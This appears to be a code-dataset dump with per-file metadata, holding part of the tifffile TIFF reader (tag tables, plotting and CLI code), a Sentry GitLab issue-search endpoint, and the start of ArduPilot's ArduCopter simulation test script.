0x1000005b: "rt_frame_height",
0x1000005c: "rt_region_width",
0x1000005d: "rt_region_height",
0x1000005e: "rt_offset_x",
0x1000005f: "rt_offset_y",
0x10000060: "rt_zoom",
0x10000061: "rt_line_period",
0x10000062: "prescan",
0x10000063: "scan_direction_z",
# track
0x40000001: "multiplex_type", # 0 after line; 1 after frame
0x40000002: "multiplex_order",
0x40000003: "sampling_mode", # 0 sample; 1 line average; 2 frame average
0x40000004: "sampling_method", # 1 mean; 2 sum
0x40000005: "sampling_number",
0x40000006: "acquire",
0x40000007: "sample_observation_time",
0x4000000b: "time_between_stacks",
0x4000000c: "name",
0x4000000d: "collimator1_name",
0x4000000e: "collimator1_position",
0x4000000f: "collimator2_name",
0x40000010: "collimator2_position",
0x40000011: "is_bleach_track",
0x40000012: "is_bleach_after_scan_number",
0x40000013: "bleach_scan_number",
0x40000014: "trigger_in",
0x40000015: "trigger_out",
0x40000016: "is_ratio_track",
0x40000017: "bleach_count",
0x40000018: "spi_center_wavelength",
0x40000019: "pixel_time",
0x40000021: "condensor_frontlens",
0x40000023: "field_stop_value",
0x40000024: "id_condensor_aperture",
0x40000025: "condensor_aperture",
0x40000026: "id_condensor_revolver",
0x40000027: "condensor_filter",
0x40000028: "id_transmission_filter1",
0x40000029: "id_transmission1",
0x40000030: "id_transmission_filter2",
0x40000031: "id_transmission2",
0x40000032: "repeat_bleach",
0x40000033: "enable_spot_bleach_pos",
0x40000034: "spot_bleach_posx",
0x40000035: "spot_bleach_posy",
0x40000036: "spot_bleach_posz",
0x40000037: "id_tubelens",
0x40000038: "id_tubelens_position",
0x40000039: "transmitted_light",
0x4000003a: "reflected_light",
0x4000003b: "simultan_grab_and_bleach",
0x4000003c: "bleach_pixel_time",
# laser
0x50000001: "name",
0x50000002: "acquire",
0x50000003: "power",
# detection_channel
0x70000001: "integration_mode",
0x70000002: "special_mode",
0x70000003: "detector_gain_first",
0x70000004: "detector_gain_last",
0x70000005: "amplifier_gain_first",
0x70000006: "amplifier_gain_last",
0x70000007: "amplifier_offs_first",
0x70000008: "amplifier_offs_last",
0x70000009: "pinhole_diameter",
0x7000000a: "counting_trigger",
0x7000000b: "acquire",
0x7000000c: "point_detector_name",
0x7000000d: "amplifier_name",
0x7000000e: "pinhole_name",
0x7000000f: "filter_set_name",
0x70000010: "filter_name",
0x70000013: "integrator_name",
0x70000014: "channel_name",
0x70000015: "detector_gain_bc1",
0x70000016: "detector_gain_bc2",
0x70000017: "amplifier_gain_bc1",
0x70000018: "amplifier_gain_bc2",
0x70000019: "amplifier_offset_bc1",
0x70000020: "amplifier_offset_bc2",
0x70000021: "spectral_scan_channels",
0x70000022: "spi_wavelength_start",
0x70000023: "spi_wavelength_stop",
0x70000026: "dye_name",
0x70000027: "dye_folder",
# illumination_channel
0x90000001: "name",
0x90000002: "power",
0x90000003: "wavelength",
0x90000004: "aquire",
0x90000005: "detchannel_name",
0x90000006: "power_bc1",
0x90000007: "power_bc2",
# beam_splitter
0xb0000001: "filter_set",
0xb0000002: "filter",
0xb0000003: "name",
# data_channel
0xd0000001: "name",
0xd0000003: "acquire",
0xd0000004: "color",
0xd0000005: "sample_type",
0xd0000006: "bits_per_sample",
0xd0000007: "ratio_type",
0xd0000008: "ratio_track1",
0xd0000009: "ratio_track2",
0xd000000a: "ratio_channel1",
0xd000000b: "ratio_channel2",
0xd000000c: "ratio_const1",
0xd000000d: "ratio_const2",
0xd000000e: "ratio_const3",
0xd000000f: "ratio_const4",
0xd0000010: "ratio_const5",
0xd0000011: "ratio_const6",
0xd0000012: "ratio_first_images1",
0xd0000013: "ratio_first_images2",
0xd0000014: "dye_name",
0xd0000015: "dye_folder",
0xd0000016: "spectrum",
0xd0000017: "acquire",
# timer
0x12000001: "name",
0x12000002: "description",
0x12000003: "interval",
0x12000004: "trigger_in",
0x12000005: "trigger_out",
0x12000006: "activation_time",
0x12000007: "activation_number",
# marker
0x14000001: "name",
0x14000002: "description",
0x14000003: "trigger_in",
0x14000004: "trigger_out",
}
# Map TIFF tag code to attribute name, default value, type, count, validator
TIFF_TAGS = {
254: ('new_subfile_type', 0, 4, 1, TIFF_SUBFILE_TYPES()),
255: ('subfile_type', None, 3, 1,
{0: 'undefined', 1: 'image', 2: 'reduced_image', 3: 'page'}),
256: ('image_width', None, 4, 1, None),
257: ('image_length', None, 4, 1, None),
258: ('bits_per_sample', 1, 3, 1, None),
259: ('compression', 1, 3, 1, TIFF_COMPESSIONS),
262: ('photometric', None, 3, 1, TIFF_PHOTOMETRICS),
266: ('fill_order', 1, 3, 1, {1: 'msb2lsb', 2: 'lsb2msb'}),
269: ('document_name', None, 2, None, None),
270: ('image_description', None, 2, None, None),
271: ('make', None, 2, None, None),
272: ('model', None, 2, None, None),
273: ('strip_offsets', None, 4, None, None),
274: ('orientation', 1, 3, 1, TIFF_ORIENTATIONS),
277: ('samples_per_pixel', 1, 3, 1, None),
278: ('rows_per_strip', 2**32-1, 4, 1, None),
279: ('strip_byte_counts', None, 4, None, None),
280: ('min_sample_value', None, 3, None, None),
281: ('max_sample_value', None, 3, None, None), # 2**bits_per_sample
282: ('x_resolution', None, 5, 1, None),
283: ('y_resolution', None, 5, 1, None),
284: ('planar_configuration', 1, 3, 1, {1: 'contig', 2: 'separate'}),
285: ('page_name', None, 2, None, None),
286: ('x_position', None, 5, 1, None),
287: ('y_position', None, 5, 1, None),
296: ('resolution_unit', 2, 4, 1, {1: 'none', 2: 'inch', 3: 'centimeter'}),
297: ('page_number', None, 3, 2, None),
305: ('software', None, 2, None, None),
306: ('datetime', None, 2, None, None),
315: ('artist', None, 2, None, None),
316: ('host_computer', None, 2, None, None),
317: ('predictor', 1, 3, 1, {1: None, 2: 'horizontal'}),
318: ('white_point', None, 5, 2, None),
319: ('primary_chromaticities', None, 5, 6, None),
320: ('color_map', None, 3, None, None),
322: ('tile_width', None, 4, 1, None),
323: ('tile_length', None, 4, 1, None),
324: ('tile_offsets', None, 4, None, None),
325: ('tile_byte_counts', None, 4, None, None),
338: ('extra_samples', None, 3, None,
{0: 'unspecified', 1: 'assocalpha', 2: 'unassalpha'}),
339: ('sample_format', 1, 3, 1, TIFF_SAMPLE_FORMATS),
340: ('smin_sample_value', None, None, None, None),
341: ('smax_sample_value', None, None, None, None),
347: ('jpeg_tables', None, 7, None, None),
530: ('ycbcr_subsampling', 1, 3, 2, None),
531: ('ycbcr_positioning', 1, 3, 1, None),
32996: ('sgi_matteing', None, None, 1, None), # use extra_samples
32996: ('sgi_datatype', None, None, 1, None), # use sample_format
32997: ('image_depth', None, 4, 1, None),
32998: ('tile_depth', None, 4, 1, None),
33432: ('copyright', None, 1, None, None),
33445: ('md_file_tag', None, 4, 1, None),
33446: ('md_scale_pixel', None, 5, 1, None),
33447: ('md_color_table', None, 3, None, None),
33448: ('md_lab_name', None, 2, None, None),
33449: ('md_sample_info', None, 2, None, None),
33450: ('md_prep_date', None, 2, None, None),
33451: ('md_prep_time', None, 2, None, None),
33452: ('md_file_units', None, 2, None, None),
33550: ('model_pixel_scale', None, 12, 3, None),
33922: ('model_tie_point', None, 12, None, None),
34665: ('exif_ifd', None, None, 1, None),
34735: ('geo_key_directory', None, 3, None, None),
34736: ('geo_double_params', None, 12, None, None),
34737: ('geo_ascii_params', None, 2, None, None),
34853: ('gps_ifd', None, None, 1, None),
37510: ('user_comment', None, None, None, None),
42112: ('gdal_metadata', None, 2, None, None),
42113: ('gdal_nodata', None, 2, None, None),
50289: ('mc_xy_position', None, 12, 2, None),
50290: ('mc_z_position', None, 12, 1, None),
50291: ('mc_xy_calibration', None, 12, 3, None),
50292: ('mc_lens_lem_na_n', None, 12, 3, None),
50293: ('mc_channel_name', None, 1, None, None),
50294: ('mc_ex_wavelength', None, 12, 1, None),
50295: ('mc_time_stamp', None, 12, 1, None),
50838: ('imagej_byte_counts', None, None, None, None),
65200: ('flex_xml', None, 2, None, None),
# code: (attribute name, default value, type, count, validator)
}
# Map custom TIFF tag codes to attribute names and import functions
CUSTOM_TAGS = {
700: ('xmp', read_bytes),
34377: ('photoshop', read_numpy),
33723: ('iptc', read_bytes),
34675: ('icc_profile', read_bytes),
33628: ('uic1tag', read_uic1tag), # Universal Imaging Corporation STK
33629: ('uic2tag', read_uic2tag),
33630: ('uic3tag', read_uic3tag),
33631: ('uic4tag', read_uic4tag),
34361: ('mm_header', read_mm_header), # Olympus FluoView
34362: ('mm_stamp', read_mm_stamp),
34386: ('mm_user_block', read_bytes),
34412: ('cz_lsm_info', read_cz_lsm_info), # Carl Zeiss LSM
43314: ('nih_image_header', read_nih_image_header),
# 40001: ('mc_ipwinscal', read_bytes),
40100: ('mc_id_old', read_bytes),
50288: ('mc_id', read_bytes),
50296: ('mc_frame_properties', read_bytes),
50839: ('imagej_metadata', read_bytes),
51123: ('micromanager_metadata', read_json),
}
# Max line length of printed output
PRINT_LINE_LEN = 79
def imshow(data, title=None, vmin=0, vmax=None, cmap=None,
bitspersample=None, photometric='rgb', interpolation='nearest',
dpi=96, figure=None, subplot=111, maxdim=8192, **kwargs):
"""Plot n-dimensional images using matplotlib.pyplot.
Return figure, subplot and plot axis.
Requires pyplot already imported ``from matplotlib import pyplot``.
Parameters
----------
bitspersample : int or None
Number of bits per channel in integer RGB images.
photometric : {'miniswhite', 'minisblack', 'rgb', or 'palette'}
The color space of the image data.
title : str
Window and subplot title.
figure : matplotlib.figure.Figure (optional).
Matplotlib to use for plotting.
subplot : int
A matplotlib.pyplot.subplot axis.
maxdim : int
maximum image size in any dimension.
kwargs : optional
Arguments for matplotlib.pyplot.imshow.
"""
#if photometric not in ('miniswhite', 'minisblack', 'rgb', 'palette'):
# raise ValueError("Can't handle %s photometrics" % photometric)
# TODO: handle photometric == 'separated' (CMYK)
isrgb = photometric in ('rgb', 'palette')
data = numpy.atleast_2d(data.squeeze())
data = data[(slice(0, maxdim), ) * len(data.shape)]
dims = data.ndim
if dims < 2:
raise ValueError("not an image")
elif dims == 2:
dims = 0
isrgb = False
else:
if isrgb and data.shape[-3] in (3, 4):
data = numpy.swapaxes(data, -3, -2)
data = numpy.swapaxes(data, -2, -1)
elif not isrgb and (data.shape[-1] < data.shape[-2] // 16 and
data.shape[-1] < data.shape[-3] // 16 and
data.shape[-1] < 5):
data = numpy.swapaxes(data, -3, -1)
data = numpy.swapaxes(data, -2, -1)
isrgb = isrgb and data.shape[-1] in (3, 4)
dims -= 3 if isrgb else 2
if photometric == 'palette' and isrgb:
datamax = data.max()
if datamax > 255:
data >>= 8 # possible precision loss
data = data.astype('B')
elif data.dtype.kind in 'ui':
if not (isrgb and data.dtype.itemsize <= 1) or bitspersample is None:
try:
bitspersample = int(math.ceil(math.log(data.max(), 2)))
except Exception:
bitspersample = data.dtype.itemsize * 8
elif not isinstance(bitspersample, int):
# bitspersample can be tuple, e.g. (5, 6, 5)
bitspersample = data.dtype.itemsize * 8
datamax = 2**bitspersample
if isrgb:
if bitspersample < 8:
data <<= 8 - bitspersample
elif bitspersample > 8:
data >>= bitspersample - 8 # precision loss
data = data.astype('B')
elif data.dtype.kind == 'f':
datamax = data.max()
if isrgb and datamax > 1.0:
if data.dtype.char == 'd':
data = data.astype('f')
data /= datamax
elif data.dtype.kind == 'b':
datamax = 1
elif data.dtype.kind == 'c':
raise NotImplementedError("complex type") # TODO: handle complex types
if not isrgb:
if vmax is None:
vmax = datamax
if vmin is None:
if data.dtype.kind == 'i':
dtmin = numpy.iinfo(data.dtype).min
vmin = numpy.min(data)
if vmin == dtmin:
vmin = numpy.min(data > dtmin)
if data.dtype.kind == 'f':
dtmin = numpy.finfo(data.dtype).min
vmin = numpy.min(data)
if vmin == dtmin:
vmin = numpy.min(data > dtmin)
else:
vmin = 0
pyplot = sys.modules['matplotlib.pyplot']
if figure is None:
pyplot.rc('font', family='sans-serif', weight='normal', size=8)
figure = pyplot.figure(dpi=dpi, figsize=(10.3, 6.3), frameon=True,
facecolor='1.0', edgecolor='w')
try:
figure.canvas.manager.window.title(title)
except Exception:
pass
pyplot.subplots_adjust(bottom=0.03*(dims+2), top=0.9,
left=0.1, right=0.95, hspace=0.05, wspace=0.0)
subplot = pyplot.subplot(subplot)
if title:
try:
title = unicode(title, 'Windows-1252')
except TypeError:
pass
pyplot.title(title, size=11)
if cmap is None:
if data.dtype.kind in 'ubf' or vmin == 0:
cmap = 'cubehelix'
else:
cmap = 'coolwarm'
if photometric == 'miniswhite':
cmap += '_r'
image = pyplot.imshow(data[(0, ) * dims].squeeze(), vmin=vmin, vmax=vmax,
cmap=cmap, interpolation=interpolation, **kwargs)
if not isrgb:
pyplot.colorbar() # panchor=(0.55, 0.5), fraction=0.05
def format_coord(x, y):
# callback function to format coordinate display in toolbar
x = int(x + 0.5)
y = int(y + 0.5)
try:
if dims:
return "%s @ %s [%4i, %4i]" % (cur_ax_dat[1][y, x],
current, x, y)
else:
return "%s @ [%4i, %4i]" % (data[y, x], x, y)
except IndexError:
return ""
pyplot.gca().format_coord = format_coord
if dims:
current = list((0, ) * dims)
cur_ax_dat = [0, data[tuple(current)].squeeze()]
sliders = [pyplot.Slider(
pyplot.axes([0.125, 0.03*(axis+1), 0.725, 0.025]),
'Dimension %i' % axis, 0, data.shape[axis]-1, 0, facecolor='0.5',
valfmt='%%.0f [%i]' % data.shape[axis]) for axis in range(dims)]
for slider in sliders:
slider.drawon = False
def set_image(current, sliders=sliders, data=data):
# change image and redraw canvas
cur_ax_dat[1] = data[tuple(current)].squeeze()
image.set_data(cur_ax_dat[1])
for ctrl, index in zip(sliders, current):
ctrl.eventson = False
ctrl.set_val(index)
ctrl.eventson = True
figure.canvas.draw()
def on_changed(index, axis, data=data, current=current):
# callback function for slider change event
index = int(round(index))
cur_ax_dat[0] = axis
if index == current[axis]:
return
if index >= data.shape[axis]:
index = 0
elif index < 0:
index = data.shape[axis] - 1
current[axis] = index
set_image(current)
def on_keypressed(event, data=data, current=current):
# callback function for key press event
key = event.key
axis = cur_ax_dat[0]
if str(key) in '0123456789':
on_changed(key, axis)
elif key == 'right':
on_changed(current[axis] + 1, axis)
elif key == 'left':
on_changed(current[axis] - 1, axis)
elif key == 'up':
cur_ax_dat[0] = 0 if axis == len(data.shape)-1 else axis + 1
elif key == 'down':
cur_ax_dat[0] = len(data.shape)-1 if axis == 0 else axis - 1
elif key == 'end':
on_changed(data.shape[axis] - 1, axis)
elif key == 'home':
on_changed(0, axis)
figure.canvas.mpl_connect('key_press_event', on_keypressed)
for axis, ctrl in enumerate(sliders):
ctrl.on_changed(lambda k, a=axis: on_changed(k, a))
return figure, subplot, image
def _app_show():
"""Block the GUI. For use as skimage plugin."""
pyplot = sys.modules['matplotlib.pyplot']
pyplot.show()
def main(argv=None):
"""Command line usage main function."""
if float(sys.version[0:3]) < 2.6:
print("This script requires Python version 2.6 or better.")
print("This is Python version %s" % sys.version)
return 0
if argv is None:
argv = sys.argv
import optparse
parser = optparse.OptionParser(
usage="usage: %prog [options] path",
description="Display image data in TIFF files.",
version="%%prog %s" % __version__)
opt = parser.add_option
opt('-p', '--page', dest='page', type='int', default=-1,
help="display single page")
opt('-s', '--series', dest='series', type='int', default=-1,
help="display series of pages of same shape")
opt('--nomultifile', dest='nomultifile', action='store_true',
default=False, help="don't read OME series from multiple files")
opt('--noplot', dest='noplot', action='store_true', default=False,
help="don't display images")
opt('--interpol', dest='interpol', metavar='INTERPOL', default='bilinear',
help="image interpolation method")
opt('--dpi', dest='dpi', type='int', default=96,
help="set plot resolution")
opt('--debug', dest='debug', action='store_true', default=False,
help="raise exception on failures")
opt('--test', dest='test', action='store_true', default=False,
help="try read all images in path")
opt('--doctest', dest='doctest', action='store_true', default=False,
help="runs the docstring examples")
opt('-v', '--verbose', dest='verbose', action='store_true', default=True)
opt('-q', '--quiet', dest='verbose', action='store_false')
settings, path = parser.parse_args()
path = ' '.join(path)
if settings.doctest:
import doctest
doctest.testmod()
return 0
if not path:
parser.error("No file specified")
if settings.test:
test_tifffile(path, settings.verbose)
return 0
if any(i in path for i in '?*'):
path = glob.glob(path)
if not path:
print('no files match the pattern')
return 0
# TODO: handle image sequences
#if len(path) == 1:
path = path[0]
print("Reading file structure...", end=' ')
start = time.time()
try:
tif = TiffFile(path, multifile=not settings.nomultifile)
except Exception as e:
if settings.debug:
raise
else:
print("\n", e)
sys.exit(0)
print("%.3f ms" % ((time.time()-start) * 1e3))
if tif.is_ome:
settings.norgb = True
images = [(None, tif[0 if settings.page < 0 else settings.page])]
if not settings.noplot:
print("Reading image data... ", end=' ')
def notnone(x):
return next(i for i in x if i is not None)
start = time.time()
try:
if settings.page >= 0:
images = [(tif.asarray(key=settings.page),
tif[settings.page])]
elif settings.series >= 0:
images = [(tif.asarray(series=settings.series),
notnone(tif.series[settings.series].pages))]
else:
images = []
for i, s in enumerate(tif.series):
try:
images.append(
(tif.asarray(series=i), notnone(s.pages)))
except ValueError as e:
images.append((None, notnone(s.pages)))
if settings.debug:
raise
else:
print("\n* series %i failed: %s... " % (i, e),
end='')
print("%.3f ms" % ((time.time()-start) * 1e3))
except Exception as e:
if settings.debug:
raise
else:
print(e)
tif.close()
print("\nTIFF file:", tif)
print()
for i, s in enumerate(tif.series):
print ("Series %i" % i)
print(s)
print()
for i, page in images:
print(page)
print(page.tags)
if page.is_palette:
print("\nColor Map:", page.color_map.shape, page.color_map.dtype)
for attr in ('cz_lsm_info', 'cz_lsm_scan_info', 'uic_tags',
'mm_header', 'imagej_tags', 'micromanager_metadata',
'nih_image_header'):
if hasattr(page, attr):
print("", attr.upper(), Record(getattr(page, attr)), sep="\n")
print()
if page.is_micromanager:
print('MICROMANAGER_FILE_METADATA')
print(Record(tif.micromanager_metadata))
if images and not settings.noplot:
try:
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot
except ImportError as e:
warnings.warn("failed to import matplotlib.\n%s" % e)
else:
for img, page in images:
if img is None:
continue
vmin, vmax = None, None
if 'gdal_nodata' in page.tags:
try:
vmin = numpy.min(img[img > float(page.gdal_nodata)])
except ValueError:
pass
if page.is_stk:
try:
vmin = page.uic_tags['min_scale']
vmax = page.uic_tags['max_scale']
except KeyError:
pass
else:
if vmax <= vmin:
vmin, vmax = None, None
title = "%s\n %s" % (str(tif), str(page))
imshow(img, title=title, vmin=vmin, vmax=vmax,
bitspersample=page.bits_per_sample,
photometric=page.photometric,
interpolation=settings.interpol,
dpi=settings.dpi)
pyplot.show()
TIFFfile = TiffFile # backwards compatibility
if sys.version_info[0] > 2:
basestring = str, bytes
unicode = str
if __name__ == "__main__":
sys.exit(main())
|
bsd-3-clause
| 771,240,095,069,591,600
| 34.651316
| 79
| 0.537928
| false
| 3.695429
| false
| false
| false
|
mvaled/sentry
|
src/sentry/integrations/gitlab/search.py
|
2
|
2359
|
from __future__ import absolute_import
import six
from rest_framework.response import Response
from sentry.api.bases.integration import IntegrationEndpoint
from sentry.integrations.exceptions import ApiError
from sentry.models import Integration
class GitlabIssueSearchEndpoint(IntegrationEndpoint):
def get(self, request, organization, integration_id):
try:
integration = Integration.objects.get(
organizations=organization, id=integration_id, provider="gitlab"
)
except Integration.DoesNotExist:
return Response(status=404)
field = request.GET.get("field")
query = request.GET.get("query")
if field is None:
return Response({"detail": "field is a required parameter"}, status=400)
if query is None:
return Response({"detail": "query is a required parameter"}, status=400)
installation = integration.get_installation(organization.id)
if field == "externalIssue":
project = request.GET.get("project")
if project is None:
return Response({"detail": "project is a required parameter"}, status=400)
try:
iids = [int(query)]
query = None
except ValueError:
iids = None
try:
response = installation.search_issues(query=query, project_id=project, iids=iids)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{
"label": "(#%s) %s" % (i["iid"], i["title"]),
"value": "%s#%s" % (i["project_id"], i["iid"]),
}
for i in response
]
)
elif field == "project":
try:
response = installation.search_projects(query)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{"label": project["name_with_namespace"], "value": project["id"]}
for project in response
]
)
return Response({"detail": "invalid field value"}, status=400)
|
bsd-3-clause
| 6,474,268,268,709,563,000
| 34.742424
| 97
| 0.539635
| false
| 4.884058
| false
| false
| false
|
samuelctabor/ardupilot
|
Tools/autotest/arducopter.py
|
1
|
288681
|
#!/usr/bin/env python
'''
Fly Copter in SITL
AP_FLAKE8_CLEAN
'''
from __future__ import print_function
import copy
import math
import os
import shutil
import time
import numpy
from pymavlink import mavutil
from pymavlink import mavextra
from pymavlink import rotmat
from pysim import util
from pysim import vehicleinfo
from common import AutoTest
from common import NotAchievedException, AutoTestTimeoutException, PreconditionFailedException
from common import Test
from pymavlink.rotmat import Vector3
# get location of scripts
testdir = os.path.dirname(os.path.realpath(__file__))
SITL_START_LOCATION = mavutil.location(-35.362938, 149.165085, 584, 270)
SITL_START_LOCATION_AVC = mavutil.location(40.072842, -105.230575, 1586, 0)
# Flight mode switch positions are set-up in arducopter.param to be
# switch 1 = Circle
# switch 2 = Land
# switch 3 = RTL
# switch 4 = Auto
# switch 5 = Loiter
# switch 6 = Stabilize
class AutoTestCopter(AutoTest):
@staticmethod
def get_not_armable_mode_list():
return ["AUTO", "AUTOTUNE", "BRAKE", "CIRCLE", "FLIP", "LAND", "RTL", "SMART_RTL", "AVOID_ADSB", "FOLLOW"]
@staticmethod
def get_not_disarmed_settable_modes_list():
return ["FLIP", "AUTOTUNE"]
@staticmethod
def get_no_position_not_settable_modes_list():
return []
@staticmethod
def get_position_armable_modes_list():
return ["DRIFT", "GUIDED", "LOITER", "POSHOLD", "THROW"]
@staticmethod
def get_normal_armable_modes_list():
return ["ACRO", "ALT_HOLD", "SPORT", "STABILIZE", "GUIDED_NOGPS"]
def log_name(self):
return "ArduCopter"
def test_filepath(self):
return os.path.realpath(__file__)
def set_current_test_name(self, name):
self.current_test_name_directory = "ArduCopter_Tests/" + name + "/"
def sitl_start_location(self):
return SITL_START_LOCATION
def mavproxy_options(self):
ret = super(AutoTestCopter, self).mavproxy_options()
if self.frame != 'heli':
ret.append('--quadcopter')
return ret
def sitl_streamrate(self):
return 5
def vehicleinfo_key(self):
return 'ArduCopter'
def default_frame(self):
return "+"
def apply_defaultfile_parameters(self):
# Copter passes in a defaults_filepath in place of applying
# parameters afterwards.
pass
def defaults_filepath(self):
return self.model_defaults_filepath(self.vehicleinfo_key(), self.frame)
def wait_disarmed_default_wait_time(self):
return 120
def close(self):
super(AutoTestCopter, self).close()
# [2014/05/07] FC Because I'm doing a cross machine build
# (source is on host, build is on guest VM) I cannot hard link
# This flag tells me that I need to copy the data out
if self.copy_tlog:
shutil.copy(self.logfile, self.buildlog)
def is_copter(self):
return True
def get_stick_arming_channel(self):
return int(self.get_parameter("RCMAP_YAW"))
def get_disarm_delay(self):
return int(self.get_parameter("DISARM_DELAY"))
def set_autodisarm_delay(self, delay):
self.set_parameter("DISARM_DELAY", delay)
def user_takeoff(self, alt_min=30):
'''takeoff using mavlink takeoff command'''
self.run_cmd(mavutil.mavlink.MAV_CMD_NAV_TAKEOFF,
0, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
alt_min # param7
)
self.progress("Ran command")
self.wait_for_alt(alt_min)
def takeoff(self,
alt_min=30,
takeoff_throttle=1700,
require_absolute=True,
mode="STABILIZE",
timeout=120):
"""Takeoff get to 30m altitude."""
self.progress("TAKEOFF")
self.change_mode(mode)
if not self.armed():
self.wait_ready_to_arm(require_absolute=require_absolute, timeout=timeout)
self.zero_throttle()
self.arm_vehicle()
if mode == 'GUIDED':
self.user_takeoff(alt_min=alt_min)
else:
self.set_rc(3, takeoff_throttle)
self.wait_for_alt(alt_min=alt_min, timeout=timeout)
self.hover()
self.progress("TAKEOFF COMPLETE")
def wait_for_alt(self, alt_min=30, timeout=30, max_err=5):
"""Wait for minimum altitude to be reached."""
self.wait_altitude(alt_min - 1,
(alt_min + max_err),
relative=True,
timeout=timeout)
def land_and_disarm(self, timeout=60):
"""Land the quad."""
self.progress("STARTING LANDING")
self.change_mode("LAND")
self.wait_landed_and_disarmed(timeout=timeout)
def wait_landed_and_disarmed(self, min_alt=6, timeout=60):
"""Wait to be landed and disarmed"""
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
if alt > min_alt:
self.wait_for_alt(min_alt, timeout=timeout)
# self.wait_statustext("SIM Hit ground", timeout=timeout)
self.wait_disarmed()
def hover(self, hover_throttle=1500):
self.set_rc(3, hover_throttle)
# Climb/descend to a given altitude
def setAlt(self, desiredAlt=50):
pos = self.mav.location(relative_alt=True)
if pos.alt > desiredAlt:
self.set_rc(3, 1300)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
if pos.alt < (desiredAlt-5):
self.set_rc(3, 1800)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
self.hover()
# Takeoff, climb to given altitude, and fly east for 10 seconds
def takeoffAndMoveAway(self, dAlt=50, dDist=50):
self.progress("Centering sticks")
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1000,
4: 1500,
})
self.takeoff(alt_min=dAlt)
self.change_mode("ALT_HOLD")
self.progress("Yaw to east")
self.set_rc(4, 1580)
self.wait_heading(90)
self.set_rc(4, 1500)
self.progress("Fly eastbound away from home")
self.set_rc(2, 1800)
self.delay_sim_time(10)
self.set_rc(2, 1500)
self.hover()
self.progress("Copter staging 50 meters east of home at 50 meters altitude In mode Alt Hold")
# loiter - fly south west, then loiter within 5m position and altitude
def loiter(self, holdtime=10, maxaltchange=5, maxdistchange=5):
"""Hold loiter position."""
self.takeoff(10, mode="LOITER")
# first aim south east
self.progress("turn south east")
self.set_rc(4, 1580)
self.wait_heading(170)
self.set_rc(4, 1500)
# fly south east 50m
self.set_rc(2, 1100)
self.wait_distance(50)
self.set_rc(2, 1500)
# wait for copter to slow moving
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
"Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange))
self.progress("Loiter OK for %u seconds" % holdtime)
self.progress("Climb to 30m")
self.change_alt(30)
self.progress("Descend to 20m")
self.change_alt(20)
self.do_RTL()
def watch_altitude_maintained(self, min_alt, max_alt, timeout=10):
'''watch alt, relative alt must remain between min_alt and max_alt'''
tstart = self.get_sim_time_cached()
while True:
if self.get_sim_time_cached() - tstart > timeout:
return
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
if m.alt <= min_alt:
raise NotAchievedException("Altitude not maintained: want >%f got=%f" % (min_alt, m.alt))
def test_mode_ALT_HOLD(self):
self.takeoff(10, mode="ALT_HOLD")
self.watch_altitude_maintained(9, 11, timeout=5)
# feed in full elevator and aileron input and make sure we
# retain altitude:
self.set_rc_from_map({
1: 1000,
2: 1000,
})
self.watch_altitude_maintained(9, 11, timeout=5)
self.set_rc_from_map({
1: 1500,
2: 1500,
})
self.do_RTL()
def fly_to_origin(self, final_alt=10):
origin = self.poll_message("GPS_GLOBAL_ORIGIN")
self.change_mode("GUIDED")
self.guided_move_global_relative_alt(origin.latitude,
origin.longitude,
final_alt)
def change_alt(self, alt_min, climb_throttle=1920, descend_throttle=1080):
"""Change altitude."""
def adjust_altitude(current_alt, target_alt, accuracy):
if math.fabs(current_alt - target_alt) <= accuracy:
self.hover()
elif current_alt < target_alt:
self.set_rc(3, climb_throttle)
else:
self.set_rc(3, descend_throttle)
self.wait_altitude(
(alt_min - 5),
alt_min,
relative=True,
called_function=lambda current_alt, target_alt: adjust_altitude(current_alt, target_alt, 1)
)
self.hover()
def setGCSfailsafe(self, paramValue=0):
# Slow down the sim rate if GCS Failsafe is in use
if paramValue == 0:
self.set_parameter("FS_GCS_ENABLE", paramValue)
self.set_parameter("SIM_SPEEDUP", 10)
else:
self.set_parameter("SIM_SPEEDUP", 4)
self.set_parameter("FS_GCS_ENABLE", paramValue)
# fly a square in alt_hold mode
def fly_square(self, side=50, timeout=300):
self.takeoff(20, mode="ALT_HOLD")
"""Fly a square, flying N then E ."""
tstart = self.get_sim_time()
# ensure all sticks in the middle
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1500,
4: 1500,
})
# switch to loiter mode temporarily to stop us from rising
self.change_mode('LOITER')
# first aim north
self.progress("turn right towards north")
self.set_rc(4, 1580)
self.wait_heading(10)
self.set_rc(4, 1500)
# save bottom left corner of box as waypoint
self.progress("Save WP 1 & 2")
self.save_wp()
# switch back to ALT_HOLD mode
self.change_mode('ALT_HOLD')
# pitch forward to fly north
self.progress("Going north %u meters" % side)
self.set_rc(2, 1300)
self.wait_distance(side)
self.set_rc(2, 1500)
# save top left corner of square as waypoint
self.progress("Save WP 3")
self.save_wp()
# roll right to fly east
self.progress("Going east %u meters" % side)
self.set_rc(1, 1700)
self.wait_distance(side)
self.set_rc(1, 1500)
# save top right corner of square as waypoint
self.progress("Save WP 4")
self.save_wp()
# pitch back to fly south
self.progress("Going south %u meters" % side)
self.set_rc(2, 1700)
self.wait_distance(side)
self.set_rc(2, 1500)
# save bottom right corner of square as waypoint
self.progress("Save WP 5")
self.save_wp()
# roll left to fly west
self.progress("Going west %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side)
